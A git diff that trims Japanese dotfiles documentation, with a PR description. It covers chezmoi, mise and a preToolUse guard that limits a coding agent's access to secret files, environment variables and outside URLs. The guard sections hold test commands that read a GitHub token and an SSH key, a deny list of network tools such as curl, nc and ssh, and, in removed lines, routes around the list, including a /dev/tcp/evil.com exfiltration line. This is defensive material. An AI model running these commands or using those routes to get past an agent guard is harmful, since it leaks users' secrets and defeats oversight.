 npx skills add -g <owner>/<repo>/<path>
@@ -66,133 +41,64 @@ chezmoi re-add ~/.copilot/skills/<skill-name>
 chezmoi diff
 ```
 
-現在インストール済みのスキル:
-
-| スキル | ソース | 用途 |
-|--------|--------|------|
-| `microsoft-skill-creator` | [github/awesome-copilot](https://github.com/github/awesome-copilot) (MIT) | MS Learn MCP を使って Microsoft 技術のスキルを生成 |
-
 ## セキュリティフック
 
-コーディングエージェントは `bash` ツールを通じてファイル読み取りやコマンド実行を行える。便利な一方で、秘匿情報の意図しない読み取りや外部送信のリスクがある。このリポジトリでは `preToolUse` フックで **ツール実行前に検査し、危険な操作を自動拒否（deny）または確認付きアクセス（ask）に振り分ける** ガードを提供している。
+この repo では `preToolUse` フックで、ツール実行前に次を検査する。
 
-脅威モデル、多層防御の構造、各チェック層の判定ロジックについては [`docs/architecture.md` の Copilot Guard セクション](architecture.md#copilot-guard-の設計) を参照する。
+- **秘匿ファイルの拒否**: `blocked-files.txt`
+- **確認付きアクセス**: `ask-files.txt`
+- **許可外 URL の拒否**: `allowed-urls.txt`
+- **機微な環境変数の読み取り拒否**: `copilot-guard.py`
+- **`python` / `pip` 直接実行の拒否**: `uv-enforcer.py`
 
-### 設定ファイルのカスタマイズ
+判定の詳細な設計は [`docs/architecture.md`](architecture.md#copilot-guard-の設計) を参照。
 
-#### blocked-files.txt
+### ガード用ファイルの編集
 
-ブロック対象（deny）のファイルパスをグロブパターンで記述する。1 行 1 パターン、`#` で始まる行はコメント。マッチしたファイルへのアクセスは即座に拒否される。
+- `blocked-files.txt` と `ask-files.txt` は 1 行 1 パターン
+- `#` 始まりの行はコメント
+- パス比較前に `\` は `/` へ正規化される
+- 同じパスが両方に当たる場合は **deny が優先**
 
-**パターン記法**:
+`allowed-urls.txt` は 1 行 1 ドメイン。全行コメントアウトすると URL チェックを無効化できる。
 
-| 記法 | 意味 | 例 |
-|------|------|------|
-| `*` | 1 つのパスセグメント内の任意の文字列 | `*.pem` → `server.pem` にマッチ |
-| `?` | 1 つのパスセグメント内の任意の 1 文字 | `?.key` → `a.key` にマッチ |
-| `**` | パスセグメントをまたぐ任意の文字列 | `**/.env` → `src/app/.env` にマッチ |
-| `**/` | 0 個以上のディレクトリプレフィックス | `**/.azure/*` → `.azure/config` にも `a/b/.azure/config` にもマッチ |
-
-**パス正規化**: マッチング前に `\` → `/` への変換、連続 `/` の圧縮、先頭 `./` の除去、`file://` URI の展開が行われる。Windows パス（`C:\Users\...`）も正しくマッチする。
-
-#### allowed-urls.txt
-
-許可するドメインを 1 行 1 つ記述する。サブドメインも自動的に許可される（例: `github.com` は `api.github.com` も許可）。全行コメントアウトすると URL チェック自体が無効になる。
-
-#### ask-files.txt
-
-確認付きアクセス（ask）のファイルパスをグロブパターンで記述する。`blocked-files.txt` と同じ書式・パターン記法。マッチしたファイルへのアクセスはユーザーに確認プロンプトが表示され、明示的な承認が必要になる。
-
-同一パスが `blocked-files.txt` と `ask-files.txt` の両方にマッチした場合は deny が優先される。
-
-判定の優先度: **deny > ask > allow**
-
-### フックのテスト
-
-フックは stdin に JSON を受け取り、stdout に許可 / 拒否の JSON を返す。
+## フックの確認
 
 ```bash
-# copilot-guard: ファイル・URL アクセス制御
+# ファイル・URL・環境変数アクセス
 echo '{"toolName":"edit","toolArgs":{"path":".env"}}' | uv run ~/.copilot/hooks/scripts/copilot-guard.py
-
-# copilot-guard: 環境変数アクセスのブロック（bash ツールのみ対象）
-echo '{"toolName":"bash","toolArgs":{"command":"printenv"}}' | uv run ~/.copilot/hooks/scripts/copilot-guard.py
 echo '{"toolName":"bash","toolArgs":{"command":"echo $GITHUB_TOKEN"}}' | uv run ~/.copilot/hooks/scripts/copilot-guard.py
 
-# copilot-guard: 安全な変数参照は許可
-echo '{"toolName":"bash","toolArgs":{"command":"echo $HOME"}}' | uv run ~/.copilot/hooks/scripts/copilot-guard.py
-
-# copilot-guard: Hook ファイルへの確認付きアクセス (ask)
-echo '{"toolName":"edit","toolArgs":{"path":"/home/user/.copilot/hooks/hooks.json"}}' | uv run ~/.copilot/hooks/scripts/copilot-guard.py
-
-# copilot-guard: SSH 鍵アクセスのブロック
-echo '{"toolName":"bash","toolArgs":{"command":"cat ~/.ssh/id_ed25519"}}' | uv run ~/.copilot/hooks/scripts/copilot-guard.py
-
-# uv-enforcer: python/pip 直接実行のブロック
+# python/pip 直接実行の抑止
 echo '{"toolName":"bash","toolArgs":{"command":"python script.py"}}' | uv run ~/.copilot/hooks/scripts/uv-enforcer.py
 ```
 
-### 自動テスト
+自動テスト:
 
 ```bash
-# ユニットテスト（86 テストケース）
 uv run -m unittest tests.test_copilot_guard -v
 ```
 
-CI でも自動実行される（`.github/workflows/test-copilot-guard.yml`）。Hook 関連ファイルの変更時と週次スケジュールで実行し、fail-open リグレッションを検知する。
+## `copilot-safe`
 
-### Autopilot モードでの安全な利用
+`.zshrc` / `PowerShell_profile.ps1` の `copilot-safe` は、Autopilot での事故を減らすための起動ラッパーである。主に次を固定する。
 
-`--allow-all` 下ではツール承認・パス権限・URL 権限がすべて無効化されるが、`--deny-tool` と Hooks は引き続き有効である。`.zshrc` / `PowerShell_profile.ps1` に定義された `copilot-safe` エイリアス/関数は、多層防御を固定化した Autopilot 起動設定である。
+- `--deny-tool` による外部送信系コマンドの制限
+- `--secret-env-vars` による機微な環境変数の隠蔽
+- `--max-autopilot-continues 20` による連続実行数の上限
 
-```bash
-copilot-safe -p "YOUR PROMPT"
-```
+`--deny-tool` の具体的な記法や制限は `copilot help permissions` と公式ドキュメントを参照。
 
-このエイリアスには以下が含まれる:
+## 監査ログ
 
-- `--deny-tool` による外部送信コマンドのブロック（fail-open リスクなし）
-- `--secret-env-vars` による機微な環境変数値の隠蔽
-- `--max-autopilot-continues 20` による実行ステップ数の上限
-
-#### `--deny-tool` でブロックするコマンド
-
-| カテゴリ | zsh | PowerShell（追加分） |
-|----------|-----|---------------------|
-| HTTP クライアント | `curl`, `wget` | `curl.exe`, `wget.exe`, `Invoke-WebRequest`, `iwr`, `Invoke-RestMethod`, `irm`, `Start-BitsTransfer`, `bitsadmin`, `bitsadmin.exe` |
-| DNS ルックアップ | `nslookup`, `dig`, `host` | `nslookup.exe`, `dig.exe`, `host.exe`, `Resolve-DnsName` |
-| Raw ネットワーク | `nc`, `netcat`, `ncat`, `socat`, `telnet` | `nc.exe`, `netcat.exe`, `ncat.exe`, `socat.exe`, `telnet.exe`, `Test-NetConnection`, `tnc` |
-| リモートファイル転送 | `ssh`, `scp`, `sftp`, `ftp` | `ssh.exe`, `scp.exe`, `sftp.exe`, `ftp.exe` |
-
-> **`shell()` のマッチングは完全一致** — コマンド名の先頭に対する exact match で判定される（`copilot help permissions` 参照）。そのため Windows の `.exe` 付き形式や PowerShell エイリアスは別エントリとしてブロックする必要がある。`shell(ssh)` は `ssh-keygen` には誤爆しない。
-
-#### `--deny-tool` の限界
-
-`--deny-tool` はコマンド名ベースのブロックであり、**包括的なデータ送信防止ではない**。以下の経路はカバーできない:
-
-- **汎用ランタイム経由**: `python -c "import urllib..."`, `node -e "require('http')..."`, `.NET` の `System.Net.WebClient` 等
-- **bash の疑似デバイス**: `echo $SECRET > /dev/tcp/evil.com/80`
-- **エンコードされたコマンド**: Base64 等で難読化されたコマンドの間接実行
-
-これらは copilot-guard.py の URL 許可リストチェック、環境変数アクセスチェック、および OS レベルのネットワーク制御で補完する。`--deny-tool` は多層防御の第一層（fail-open リスクなし）として機能し、copilot-guard.py（第二層）と組み合わせて使う設計である。
-
-ファイルの読み取り・書き込み保護は `--deny-tool` ではなく preToolUse Hook（copilot-guard.py + blocked-files.txt / ask-files.txt）が担う。`--deny-tool` がサポートする kind は `shell(cmd)`, `write`（パス指定不可）, `url(domain)`, `<MCP>(tool)` のみであり、`read(...)` kind は存在しない（`copilot help permissions` で確認済み）。
-
-環境に応じて `--disable-mcp-server` や `--excluded-tools` を追加して攻撃面をさらに縮小できる。
-
-### 監査ログ
-
-`postToolUse` フックにより、ツール実行ごとに `~/.copilot/audit.jsonl` へログが記録される。
+`postToolUse` フックで `~/.copilot/audit.jsonl` に記録する。
 
 ```bash
-# 直近のツール実行を確認
-tail -5 ~/.copilot/audit.jsonl | python3 -m json.tool
-
-# 環境変数 COPILOT_AUDIT_DIR でログ出力先を変更可能
+tail -5 ~/.copilot/audit.jsonl | uv run python -m json.tool
 COPILOT_AUDIT_DIR=/path/to/logs copilot
 ```
 
-### 参考資料
+## 参考
 
-- [GitHub Copilot CLI — Permissions](https://docs.github.com/en/copilot/copilot-cli/using-copilot-cli/permissions) — 公式のパーミッション設計ドキュメント
-- [GitHub Copilot CLI — Hooks](https://docs.github.com/en/copilot/copilot-cli/using-copilot-cli/using-copilot-cli-hooks) — 公式の Hooks 設定リファレンス
+- [GitHub Copilot CLI — Permissions](https://docs.github.com/en/copilot/copilot-cli/using-copilot-cli/permissions)
+- [GitHub Copilot CLI — Hooks](https://docs.github.com/en/copilot/copilot-cli/using-copilot-cli/using-copilot-cli-hooks)

--- a/docs/operations.md
+++ b/docs/operations.md
@@ -1,91 +1,78 @@
 # Operations Guide
 
-`README.md` には日常的に使う手順だけを残し、このファイルには運用の詳細と非日常作業をまとめる。
+`README.md` には日常的に使う操作だけを残し、このファイルには **このリポジトリ固有の運用** をまとめる。一般的な `chezmoi` / `mise` の使い方は各公式ドキュメントを参照。
 
-## パッケージの管理
+## ツールの管理境界
 
-| 環境 | 管理ツール | 対象 |
-|------|-----------|------|
-| Linux / WSL | `apt` + `mise` | apt: OS パッケージ + Azure CLI、mise: 開発ツール + `copilot-cli` |
-| macOS | `brew` + `mise` | brew: OS パッケージ・GUI アプリ + Azure CLI + `copilot-cli`、mise: その他の開発ツール |
-| Codespaces / Dev Container | ベースイメージ / Feature + `mise` | Feature: Azure CLI など、mise: 開発ツール + `copilot-cli` |
-| Windows | `winget` (DSC) + `mise` | winget: GUI/CLI アプリ + Azure CLI + `copilot-cli`、mise: その他の開発ツール |
+| 環境 | 管理ツール | 主な対象 |
+|------|-----------|----------|
+| Linux / WSL | `apt` + `mise` | OS パッケージ、Azure CLI、開発ツール、`copilot-cli` |
+| macOS | `brew` + `mise` | OS パッケージ、GUI アプリ、Azure CLI、開発ツール |
+| Codespaces / Dev Container | ベースイメージ / Feature + `mise` | コンテナ基盤側ツール、開発ツール |
+| Windows | `winget` (DSC) + `mise` | GUI/CLI アプリ、Azure CLI、開発ツール |
 | 全環境共通 | `uv` | Python スクリプト実行 |
 
-> **Azure CLI / Copilot CLI**: GUI アプリやプラットフォーム固有の導入都合があるため、必要に応じて各プラットフォームの公式パッケージマネージャーで管理する。Codespaces / Dev Container では Linux 系の流れに合わせて `mise` または devcontainer Feature を使う。
+`copilot-cli` は例外で、Linux 系は `mise`、macOS は `brew`、Windows は `winget` で管理する。
 
-## chezmoi コマンドリファレンス
+## 定期チェック対象の制約
 
-| コマンド | 参照先 | 用途 |
-|----------|--------|------|
-| `chezmoi init <repo>` | リモート | 初回セットアップ、構成テンプレート変更時の再初期化 |
-| `chezmoi update` | リモート | `git pull` + `apply` を一括実行 |
-| `chezmoi apply` | ローカル | ソース → ホームに反映 |
-| `chezmoi diff` | ローカル | ソースとホームの差分表示 |
-| `chezmoi cat <file>` | ローカル | テンプレート展開結果の確認 |
-| `chezmoi edit <file>` | ローカル | ソースを編集 |
-| `chezmoi add <file>` | ローカル | ホームの変更をソースに取り込み |
+`mise` 設定や導入元を見直すときは、次の制約がまだ残っているか確認する。
 
-リモート参照は `init` と `update` のみである。変更を共有するには、chezmoi のソースディレクトリで `git commit` + `git push` する。
+- **cargo-make**: linux/arm64 向け配布がない
+- **edit**: macOS 向け配布がない
+- **azure-dev**: macOS / Windows では `github:` バックエンドが実行ファイル名を正規化しないため、macOS は `brew`、Windows は `winget` を使う。Linux は `github:` バックエンドを使う
 
-## 設定ファイルの編集
+解消されていれば、条件分岐や導入元のワークアラウンドを外せる。
 
-`chezmoi edit` を使う方法と、ソースディレクトリを直接編集する方法がある。通常は `chezmoi edit` が簡潔だが、テンプレート全体を見ながら編集したい場合はソース側で作業する。
+## chezmoi での編集
+
+通常は `chezmoi edit` を使う。テンプレート全体を見ながら編集したいときだけ、ソースディレクトリを直接触る。
 
 ```bash
-# chezmoi edit を使う場合
 chezmoi edit ~/.zshrc
+chezmoi diff
+chezmoi apply
+```
 
-# ソースディレクトリを直接編集する場合
-cd $(chezmoi source-path)/..
+```bash
+cd "$(chezmoi source-path)/.."
 vim home/dot_zshrc.tmpl
 chezmoi apply
 ```
 
-## 変更の確認
+## mise の保守
 
-```bash
-chezmoi diff
-chezmoi cat ~/.gitconfig
-```
+### `mise-upgrade`
 
-## 新しいファイルを chezmoi 管理下に追加
-
-```bash
-chezmoi add ~/.some-config
-```
-
-## mise 管理ツールの更新
-
-シェル関数 `mise-upgrade`（`.zshrc` / `$PROFILE` で定義済み）が以下を一括実行する。
+シェル関数 `mise-upgrade` が次を一括実行する。
 
 1. `gh auth token` で一時トークンを取得
-2. `mise upgrade` で全ツールを最新化
-3. lockfile を削除し、`mise lock --global --platform` で全プラットフォーム分を再生成
-4. `chezmoi re-add` で lockfile をソースに反映
+2. `mise upgrade` を実行
+3. 既存 lockfile を削除し、`mise lock --global --platform ...` で再生成
+4. `chezmoi re-add` でソースへ戻す
 5. git commit + push
 
 ```bash
 mise-upgrade
 ```
 
-初期構築直後は、現セッションにシェル設定が読み込まれていないことがある。使う前にターミナルを再起動するか、手動で読み込む。
+初期構築直後はシェル設定が未読込のことがある。必要なら bash / zsh では `source ~/.zshrc`、PowerShell では `. $PROFILE` を実行する。
 
-- bash / zsh: `source ~/.zshrc`
-- PowerShell: `. $PROFILE`
+### 手動で更新する場合
 
-他の端末では `chezmoi update` で lockfile が同期され、`mise install` は lockfile の URL から直接ダウンロードする。
+この repo では次の 2 点が重要である。
 
-### 手動で実行する場合
+- `mise lock` は **`--global` が必須**
+- lockfile 再生成時は **`--platform` を常に指定**
 
-`mise lock` はデフォルトでプロジェクトレベルの設定のみ対象にするため、グローバル設定には **`--global`** が必須。また引数なしだと既定の 8 プラットフォーム（musl 含む）を対象にするため、**`--platform` も常に指定する**。`mise upgrade` 後は lockfile を削除してから再生成する。`mise lock` は既存エントリのリフレッシュしか行わず、`mise upgrade` がバックエンドによっては新バージョンのエントリを追加しないことがあるため。
+さらに `mise upgrade` 後は lockfile を削除してから再生成する。既存エントリだけが残り、新版が反映されないことがあるため。
 
 ```bash
 GITHUB_TOKEN=$(gh auth token) mise upgrade
 rm -f ~/.config/mise/mise.lock
 GITHUB_TOKEN=$(gh auth token) mise lock --global --platform linux-x64,linux-arm64,macos-arm64,windows-x64,windows-arm64
 chezmoi re-add ~/.config/mise/mise.lock
-cd $(chezmoi source-path)/.. && git add -A && git commit -m "chore: upgrade mise tools" && git push
+cd "$(chezmoi source-path)/.." && git add -A && git commit -m "chore: upgrade mise tools" && git push
 ```
 
 ```powershell
@@ -94,7 +81,7 @@ chezmoi re-add ~\.config\mise\mise.lock
 cd (Join-Path (chezmoi source-path) ".."); git add -A; git commit -m "chore: upgrade mise tools"; git push
 ```
 
-## mise のツール追加・削除
+### ツールの追加・削除
 
 ```bash
 chezmoi edit ~/.config/mise/config.toml
@@ -104,15 +91,13 @@ chezmoi re-add ~/.config/mise/config.toml
 chezmoi re-add ~/.config/mise/mise.lock
 ```
 
-PowerShell の場合は `$env:GITHUB_TOKEN = (gh auth token); <command>; $env:GITHUB_TOKEN = $null` で囲む。`--platform` の値は必ずクォートする。
+PowerShell では `$env:GITHUB_TOKEN = (gh auth token); <command>; $env:GITHUB_TOKEN = $null` で囲む。`--platform` の値は必ずクォートする。
 
-`copilot-cli` は例外で、Linux 系のみ `mise` で管理する。macOS は `brew`、Windows は `winget` (DSC) 側を更新する。
+### lockfile の再構築
 
-## mise lockfile の再構築
+次のときは lockfile を削除してから再生成する。
 
-以下の状況では lockfile を削除してから `--platform` 付きで再生成する。
-
-- 新しいプラットフォームの端末を使い始める
+- 新しいプラットフォームの端末を使い始めた
 - 不要なプラットフォームのエントリを除去したい
 - lockfile が壊れた
 
@@ -122,33 +107,17 @@ GITHUB_TOKEN=$(gh auth token) mise lock --global --platform linux-x64,linux-arm6
 chezmoi re-add ~/.config/mise/mise.lock
 ```
 
-## Bootstrap / shell pin の更新
+この repo で lockfile を更新対象にしているのは次の 5 プラットフォームである。
 
-初期セットアップ系スクリプトは、上流の最新版をその場で実行せず、リリース番号・コミット・SHA256 をリポジトリ内に pin している。これは上流の意図しない変更や改竄からの保護と、どの端末でも同じバージョンを導入する再現性を確保するためである。更新時は **バージョンの更新 → 公式チェックサムの照合 → スクリプト反映** の順で行う。
+- `linux-x64`
+- `linux-arm64`
+- `macos-arm64`
+- `windows-x64`
+- `windows-arm64`
 
-- `install.sh`
-  - `CHEZMOI_VERSION` を更新
-  - `chezmoi_<version>_checksums.txt` から利用中プラットフォーム分の SHA256 を更新
-- `home/run_once_before_20-install-mise.sh.tmpl`
-  - `MISE_VERSION` を更新
-  - `SHASUMS256.txt` から利用中プラットフォーム分の SHA256 を更新
-- `home/run_once_after_10-setup-shell.sh.tmpl`
-  - `OH_MY_ZSH_COMMIT` を更新
-  - `ZSH_COMPLETIONS_TAG` を安定版へ更新
+## GitHub API と `GITHUB_TOKEN`
 
-更新後は最低限次を実行して差分を確認する。
-
-```bash
-shellcheck install.sh
-sed '/^{{/d' home/run_once_before_20-install-mise.sh.tmpl | bash -n
-sed '/^{{/d' home/run_once_after_10-setup-shell.sh.tmpl | bash -n
-```
-
-## mise と GitHub API
-
-mise はツールのダウンロードに GitHub API を使う。未認証の場合、レート制限（60 req/hr）に抵触する可能性がある。
-
-`gh` は mise より先にシステムパッケージとして導入される。認証後に `gh auth token` で `GITHUB_TOKEN` を取得できる。
+`mise` は GitHub API を使ってダウンロード情報を解決する。未認証だとレート制限に当たりやすい。
 
 ```bash
 gh auth login
@@ -160,46 +129,41 @@ gh auth login
 $env:GITHUB_TOKEN = (gh auth token); mise install; $env:GITHUB_TOKEN = $null
 ```
 
-`run_once_after_20-mise-install.sh`（初回セットアップで `mise install` を実行するスクリプト。詳細は [`docs/architecture.md` の実行順セクション](architecture.md#run_once_-スクリプトの実行順と依存関係)を参照）は gh が認証済みなら `GITHUB_TOKEN` を自動設定する。初回セットアップで gh が未認証の場合は、セットアップ完了後に上記コマンドでリトライする。
+`GITHUB_TOKEN` を `.zshrc` や `$PROFILE` に常駐させないこと。
 
-`mise.lock` は各ツールのダウンロード URL とチェックサムを事前に解決したファイル。config.toml で `lockfile = true` を設定しており、`mise install` / `mise upgrade` ともに lockfile を自動更新する。
+## 既知のワークアラウンド
 
-| 操作 | GitHub API | トークン |
-|------|-----------|---------|
-| `mise install`（lockfile あり） | 最小限 | 推奨 |
-| `mise upgrade`（ツール更新） | 呼ぶ | 必要 |
-| `mise lock`（lockfile 再生成） | 呼ぶ | 必要 |
+- **Azure CLI SyntaxWarning**: `dot_zshrc.tmpl` の `az()` ラッパーで回避している。上流修正が入ったら削除を再検討する
 
-注意事項:
+## Bootstrap / shell pin の更新
 
-- `GITHUB_TOKEN` を `.zshrc` や `$PROFILE` に常駐させない
-- ツール追加時は `mise lock --global --platform` で全プラットフォーム分の lockfile を再生成してからコミットする
+初期セットアップ系スクリプトは、上流の最新版をその場で実行せず、リリース番号や SHA256 を pin している。更新時は **バージョン更新 → 公式チェックサム確認 → スクリプト反映** の順で行う。
 
-## mise lockfile の対象プラットフォーム
+- `install.sh`: `CHEZMOI_VERSION` と対応する SHA256
+- `home/run_once_before_20-install-mise.sh.tmpl`: `MISE_VERSION` と対応する SHA256
+- `home/run_once_after_10-setup-shell.sh.tmpl`: `OH_MY_ZSH_COMMIT`, `ZSH_COMPLETIONS_TAG`
 
-`mise` の lockfile は、現在次のプラットフォームに絞って更新している。
+最低限の確認:
 
-- `linux-x64`
-- `linux-arm64`
-- `macos-arm64`
-- `windows-x64`
-- `windows-arm64`
+```bash
+shellcheck install.sh
+sed '/^{{/d' home/run_once_before_20-install-mise.sh.tmpl | bash -n
+sed '/^{{/d' home/run_once_after_10-setup-shell.sh.tmpl | bash -n
+```
 
-それ以外のプラットフォームでも動作する可能性があるが、lockfile の更新や検証はこの一覧を前提にしている。`mise lock` で `--global --platform` を指定する際は上記を使う。
+## git pre-commit フック
 
-## git pre-commit フックの追加・更新
+この repo では、dotfiles として配布するグローバル `pre-commit` フックを使う。`gitleaks` で staged 変更を検査したあと、必要なら各リポジトリの `.git/hooks/pre-commit` へ委譲する。
 
-このリポジトリでは、グローバル `git pre-commit` フックを dotfiles の一部として配布している。フックは `gitleaks` による secret scan を実行した後、必要であれば各リポジトリ固有の `.git/hooks/pre-commit` へ処理を委譲する。
-
-初回適用後に有効化を確認する場合:
+有効化確認:
 
 ```bash
 git config --global core.hooksPath
 ```
 
-想定される出力は `~/.config/git/hooks` である。
+期待値は `~/.config/git/hooks`。
 
-グローバルフック自体を更新した場合は、dotfiles 側を修正してから通常どおり反映する。
+フック自体を更新したら通常どおり反映する。
 
 ```bash
 chezmoi edit ~/.config/git/hooks/pre-commit
@@ -207,21 +171,11 @@ chezmoi diff
 chezmoi apply
 ```
 
-新しい端末で `gitleaks` が未導入なら、`mise` で導入する。
-
-```bash
-mise install gitleaks
-```
-
-各リポジトリでローカルの `pre-commit` フックも併用したい場合は、従来どおり `.git/hooks/pre-commit` を配置してよい。グローバルフック側がそれを明示的に呼び出す構成である。
-
-## run_once_ スクリプトの再実行
+## `run_once_*` の再実行
 
 ```bash
 chezmoi state delete-bucket --bucket=scriptState
 chezmoi apply
 ```
 
-## run_once_ スクリプトの実行順と依存関係
-
-実行順と各スクリプトの依存関係は [`docs/architecture.md`](architecture.md#run_once_-スクリプトの実行順と依存関係) を参照する。変更時の確認事項もそちらにまとめている。
+実行順や依存関係は [`docs/architecture.md`](architecture.md#run_once_-スクリプトの実行順と依存関係) を参照。

--- a/docs/troubleshooting.md
+++ b/docs/troubleshooting.md
@@ -1,22 +1,22 @@
 # Troubleshooting
 
-README に載せきらない復旧手順をまとめる。
+README に載せない復旧手順だけをまとめる。一般的な `chezmoi` / `mise` の仕様説明は各公式ドキュメントを参照。
 
 ## `warning: config file template has changed`
 
-`.chezmoi.toml.tmpl` が更新された場合に表示される。設定を再生成する。
+`.chezmoi.toml.tmpl` の更新後に出る。設定を再生成する。
 
 ```bash
 chezmoi init torumakabe
 ```
 
-> **注意**: リポジトリ名を省略すると、ソースディレクトリが空になり `chezmoi update` が動かなくなる。必ず `torumakabe` を指定すること。
+リポジトリ名を省略すると、ソースディレクトリが空になり `chezmoi update` が動かなくなる。必ず `torumakabe` を指定する。
 
 ## `mise install` が部分失敗する
 
-GitHub API のレート制限が原因の場合は、[`docs/operations.md`](operations.md#mise-と-github-api) の手順でトークンを設定してリトライする。
+まず [`docs/operations.md`](operations.md#github-api-と-github_token) の手順で `GITHUB_TOKEN` を付けて再実行する。
 
-lockfile にないツールがある場合は lockfile を再生成する。[`docs/operations.md`](operations.md#mise-lockfile-の再構築) に詳細な手順がある。
+lockfile 側の問題なら再生成する。
 
 ```bash
 mise ls --missing
@@ -25,26 +25,19 @@ GITHUB_TOKEN=$(gh auth token) mise lock --global --platform linux-x64,linux-arm6
 mise install
 ```
 
-## `run_once_` スクリプトの warning / error
+## `run_once_*` スクリプトの warning / error
 
-各スクリプトの役割と実行順は [`docs/architecture.md`](architecture.md#run_once_-スクリプトの実行順と依存関係) を参照。
+実行順と役割は [`docs/architecture.md`](architecture.md#run_once_-スクリプトの実行順と依存関係) を参照。
 
-warning として継続するもの:
+- **warning で継続**: shell 設定の一部、`mise install` 後の任意ツール、追加ツール導入の失敗
+- **error で停止**: Oh My Zsh の clone、Docker 本体導入など継続に必要な処理
 
-- `run_once_after_10-setup-shell.sh`（シェル設定）: デフォルトシェルを zsh に変更できない場合
-- `run_once_after_20-mise-install.sh`（mise ツール導入）: `mise install` 後の一部ツールが未導入のまま残る場合、または状態確認・認証なしリトライの一部が失敗した場合
-- `run_once_after_30-install-tools.sh`（追加ツール導入）: 追加の Go ツール、macOS の cask、Linux の draw.io など任意ツールの導入に失敗した場合
+warning は標準エラーに表示される。表示されたコマンドを手動で再実行して復旧する。
 
-error として停止するもの:
+## `run_once_*` スクリプトが sudo を要求して停止する
 
-- Oh My Zsh の clone、Docker 本体の導入など、セットアップ継続に必要な主要処理
-
-warning は標準エラーに明示表示される。表示されたコマンドを手動で再実行して復旧できる。
-
-## `run_once_` スクリプトが sudo を要求して停止する
-
-Codespaces 以外の環境では、パッケージインストールに sudo が必要である。パスワードを入力するか、sudoers を設定する。
+Codespaces 以外ではパッケージ導入に sudo が必要である。パスワードを入力するか、sudoers を設定する。
 
 ## Dev Container で mise ツールが入っていない
 
-コンテナ作成時に `mise install` は自動スキップされる。README の Dev Container セクション、または [`docs/operations.md`](operations.md#mise-と-github-api) を参照して手動実行する。
+コンテナ作成時は `mise install` を自動実行しない。README の Dev Container セクション、または [`docs/operations.md`](operations.md#github-api-と-github_token) の手順で起動後に実行する。


### PR DESCRIPTION
## 概要

README と各ガイドの責務を整理し、一般的なツール説明や重複を減らしました。

## 変更内容

- `README.md` を入口と最短セットアップ中心に整理
- `docs/operations.md` を repo 固有の運用、`mise` の落とし穴、既知のワークアラウンド中心に整理
- `docs/copilot-cli.md` を管理境界、独自フック、`copilot-safe` の説明中心に整理
- `docs/architecture.md` / `docs/troubleshooting.md` の重複を削減
- `.github/copilot-instructions.md` にある `mise` / Copilot Guard の注意点と docs 側の記述をそろえた

## 確認

- `uv run -m unittest tests.test_copilot_guard -v`
- ローカル Markdown リンク先の存在チェック
